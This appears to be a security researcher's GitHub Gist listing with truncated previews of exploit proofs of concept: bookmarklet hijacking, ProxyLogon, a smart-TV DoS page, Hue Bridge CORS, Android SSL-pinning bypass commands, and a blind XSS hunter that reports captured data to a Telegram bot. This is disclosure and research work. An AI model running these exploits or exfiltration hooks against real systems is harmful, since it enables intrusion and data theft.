Skip to content

Instantly share code, notes, and snippets.

View vavkamil's full-sized avatar
✌️
Hack The Planet !

Kamil Vavra vavkamil

✌️
Hack The Planet !
492 followers · 48 following
View GitHub Profile
@vavkamil
vavkamil / bookmarklet.html
Created October 26, 2023 16:53
Bookmarklet hijacking
<html>
<head>
<title>Bookmarklet hijacking PoC</title>
</head>
<body>
<h1>Bookmarklet hijacking</h1>
<h2>Chromium Proof of Concept</h2>
<h3>Steps to reproduce</h3>
<p>1. <strong>Double-check that the link executes</strong> <code>alert(1)</code></p>
@vavkamil
vavkamil / covid19-plugin-wp.php
Last active November 16, 2021 19:33
covid19-plugin-wp
<?php
/**
* Plugin Name: covid19-plugin-wp
* Plugin URI: https://wordpress.org/plugins/covid19-plugin-wp
* Description: This plugin adds a custom widget to display Covid19 statistics for a selected country.
* Version: 1.0.1
* Author: @vavkamil
* Author URI: https://vavkamil.cz
* License: GPL v2 or later
@vavkamil
vavkamil / PoC_proxyLogon.py
Created March 11, 2021 21:47
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys
@vavkamil
vavkamil / strong-tv-dos-poc.html
Last active March 11, 2021 11:41
strong-tv-dos-poc.html
<html>
<head>
<title></title>
</head>
<body>
<h1>Strong TV DoS exploit</h1>
<h2>Proof of Concept</h2>
<label for="internal_ip">Any internal IP:</label>
<input type="text" name="internal_ip" id="internal_ip" autocomplete="off" onchange="get_tv_ip()">
<br><br>
@vavkamil
vavkamil / hue-cors.html
Created March 9, 2021 10:37
<html>
<head>
<title>Hue Bridge CORS PoC</title>
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://discovery.meethue.com/")
xhr.send();
xhr.onreadystatechange = function(e) {
var hue_ip;
@vavkamil
vavkamil / metadata.py
Created March 24, 2020 22:52
#!/usr/bin/env python
import argparse
import urllib.request
import concurrent.futures
from datetime import datetime, timedelta
import sys
domains = ["vavkamil.cz"]
@vavkamil
vavkamil / blocker.php
Created January 14, 2020 22:16
Vulnerable phishing infrastructure https://twitter.com/vavkamil/status/1217173739676274689
<?php
ob_start();
ini_set('display_errors',0);
$ipa = $_SERVER['HTTP_CLIENT_IP']? $_SERVER['HTTP_CLIENT_IP'] : ($_SERVER['HTTP_X_FORWARDE‌​D_FOR'] ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'] );
$useragent = $_SERVER['HTTP_USER_AGENT'];
if(isset($_POST['gotcha'])){
blockBot($ipa);
}
@vavkamil
vavkamil / android sslpining disable
Created September 15, 2019 12:28
$ apt-get update && apt-get upgrade --assume-yes
$
$ pip3 install frida-tools
$ pip3 install objection
$
$ sudo apt-get install android-tools-adb android-tools-fastboot
$
$ wget wget https://github.com/frida/frida/releases/download/12.7.0/frida-server-12.7.0-android-arm64.xz
$ unxz frida-server-12.7.0-android-arm64.xz
@vavkamil
vavkamil / keybase.md
Created September 14, 2019 11:34

Keybase proof

I hereby claim:

  • I am vavkamil on github.
  • I am kamil_kiwi (https://keybase.io/kamil_kiwi) on keybase.
  • I have a public key ASDQMrxWDIIThXhqFK9NJhP6hZTdrO5MjI7M_T4bBsTbsAo

To claim this, I am signing this object:

@vavkamil
vavkamil / blind-xss-cloudflare-worker.js
Last active November 2, 2023 14:43
Serverless Blind XSS hunter with Cloudflare Worker
addEventListener("fetch", event => {
event.respondWith(handleRequest(event.request))
})
////////////////////////////////////////////////////////////////////////////////////////////////////
// ! DON'T LEAK THE SECRETS !
// Use Workers KV if you can https://developers.cloudflare.com/workers/reference/storage/
const telegram_token = "*****REDACTED*****";
const telegram_url = "https://api.telegram.org/bot" + telegram_token + "/sendMessage";